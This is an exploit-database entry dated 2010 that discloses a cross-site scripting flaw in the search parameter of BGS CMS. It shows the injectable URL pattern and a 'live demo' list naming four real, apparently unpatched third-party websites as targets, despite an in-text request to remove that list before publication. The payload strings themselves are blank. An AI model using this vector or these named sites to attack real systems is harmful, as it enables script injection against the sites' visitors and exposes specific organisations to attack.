id: 10933
date: 02/15/2010
title: BGS CMS Cross-site scripting (XSS) Vulnerabilities
author: evilzone
cves: 

==================================================
BGS CMS Cross-site scripting (XSS) Vulnerabilities
==================================================

####################################################################
.:. Script : BGS CMS
.:. Info link: http://www.bgs-cms.com
.:. Bug Type : Cross-site scripting (XSS)
 ####################################################################

===[ Exploit ]===

http://www.server/?action=search&search=[XSS]

===[ Example ]===

http://www.server/?action=search&search=

LIVE DEMO(for validation only, remove it from publication!):

http://www.unicef.rs/?action=search&search=
http://www.landinvestment.rs/?action=search&search=
http://www.bimid.rs/?action=search&search=
http://www.buildingconcept.rs/?action=search&search=




#  0day.today [2023-03-26]  #